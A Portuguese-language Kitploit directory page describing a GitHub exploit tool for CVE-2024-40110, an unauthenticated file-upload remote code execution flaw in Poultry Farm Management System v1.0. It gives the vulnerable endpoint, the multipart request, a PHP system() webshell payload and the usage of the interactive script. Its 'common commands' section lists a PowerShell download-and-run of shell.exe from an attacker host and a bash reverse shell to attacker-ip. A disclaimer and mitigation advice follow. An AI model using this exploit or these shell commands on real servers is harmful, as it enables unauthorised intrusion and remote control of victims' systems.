Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-40110 — Exploit para CVE-2024-40110, uma RCE de upload de arquivo não autenticado no Poultry Farm Management System v1.0. Envia um shell PHP para executar comandos arbitrários no alvo. | Kitploit
Ferramentas/GitHubGitHub/angry-althaf/cve-2024-40110
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Exploit para CVE-2024-40110, uma RCE de upload de arquivo não autenticado no Poultry Farm Management System v1.0. Envia um shell PHP para executar comandos arbitrários no alvo.

Ver Repositório
1há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de Gestão de Fazenda de Aves v1.0 - Exploit RCE

Tipo de Vulnerabilidade

Upload de Arquivo Não Autenticado com Execução Remota de Código

Descrição

O Sistema de Gestão de Fazenda de Aves v1.0 contém uma vulnerabilidade crítica na funcionalidade de upload de produtos. A aplicação falha ao validar e sanitizar adequadamente os uploads de arquivos, permitindo que atacantes enviem arquivos PHP disfarçados como imagens de produtos. Esses arquivos PHP carregados podem ser executados para alcançar a execução remota de código.

Endpoint Vulnerável

root@kitploit:~
POST /paultry/farm/product.php or POST /farm/product.php

Vetor de Ataque

A vulnerabilidade pode ser explorada por:

  1. Enviando uma requisição POST para o endpoint de upload de produtos
  2. Carregando um arquivo shell PHP com comandos arbitrários
  3. Acessando o arquivo carregado para executar os comandos embutidos

Requisitos

Pré-requisitos

  • Python 3.7+
  • biblioteca requests
  • biblioteca colorama (para saída colorida)
  • Acesso de rede ao alvo vulnerável

Instalação

root@kitploit:~
pip install requests colorama

Ou instale todas as dependências:

root@kitploit:~
pip install -r requirements.txt

Uso

Uso Básico

Execute o script interativamente:

root@kitploit:~
python exploit.py

O script solicitará:

  1. Endereço IP do Alvo - O endereço IP do servidor vulnerável
  2. Porta do Alvo - O número da porta (padrão: 80)
  3. Comando para Executar - O comando do sistema a ser executado no alvo

Exemplo

root@kitploit:~
==================================================
Interactive Backdoor Upload Tool
==================================================

Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami

==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes

Funcionalidades

✅ Entrada Interativa - Solicita IP, porta e comandos personalizados
✅ Valores Padrão - Padrões sensatos para conveniência
✅ Saída Colorida - Saída colorida no terminal para fácil leitura
✅ Etapa de Confirmação - Verifique as configurações antes da execução
✅ Tratamento de Erros - Mensagens de erro elegantes para requisições com falha
✅ Comandos Flexíveis - Suporte a qualquer comando shell ou payload PowerShell

Comandos Comuns

Alvos Windows

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Alvos Linux

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

Coleta de Informações

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

Detalhes Técnicos

Como Funciona

  1. Upload de Arquivo: Envia uma requisição POST com payload PHP embutido como um arquivo
  2. Execução do Payload: O arquivo PHP carregado é armazenado em /assets/img/productimages/
  3. Execução de Comando: Acessar o arquivo PHP dispara a execução de comandos via função system()
  4. Recuperação de Saída: O script obtém a saída via requisição GET

Estrutura da Requisição

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Formato do Payload

root@kitploit:~
<?php system('COMMAND_HERE');?>

Ambiente de Teste

O exploit foi testado em:

  • SO: Windows 10
  • Servidor: XAMPP v3.3.0
  • Versão PHP: Compatível com PHP 5.6+

Aviso Legal

⚠️ AVISO LEGAL

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal.

  • Use este exploit apenas em sistemas que você possui ou tem permissão explícita por escrito para testar
  • Os autores não assumem responsabilidade por uso indevido ou danos causados por esta ferramenta
  • Os usuários são responsáveis por garantir a conformidade com todas as leis e regulamentações aplicáveis
  • Acesso, modificação ou interrupção não autorizada de sistemas de computador é crime federal sob o Computer Fraud and Abuse Act (CFAA) e leis similares em todo o mundo

Mitigação

Para Administradores

  1. Atualize o Software - Aplique patches de segurança se disponíveis

  2. Validação de Upload de Arquivo

    • Valide extensões de arquivo (whitelist: jpg, png, gif, etc.)
    • Verifique tipos MIME no lado do servidor
    • Armazene arquivos carregados fora da raiz web
    • Desabilite a execução de scripts em diretórios de upload
  3. Configuração

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Controle de Acesso

    • Implemente autenticação antes de permitir uploads
    • Valide permissões de usuário
    • Adicione limitação de taxa
  5. Monitoramento

    • Monitore diretórios de upload para arquivos suspeitos
    • Registre todas as tentativas de upload
    • Implemente verificação de integridade de arquivos

Referências

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Original Software: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Solução de Problemas

Conexão Recusada

root@kitploit:~
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running

404 Não Encontrado

root@kitploit:~
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/

PHP Não Executado

root@kitploit:~
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly

Suporte

Para problemas, perguntas ou melhorias, consulte o repositório GitHub ou a página do Exploit-DB.


Última Atualização: Dezembro 2024
Status: Verificado e Testado

Baixar ferramenta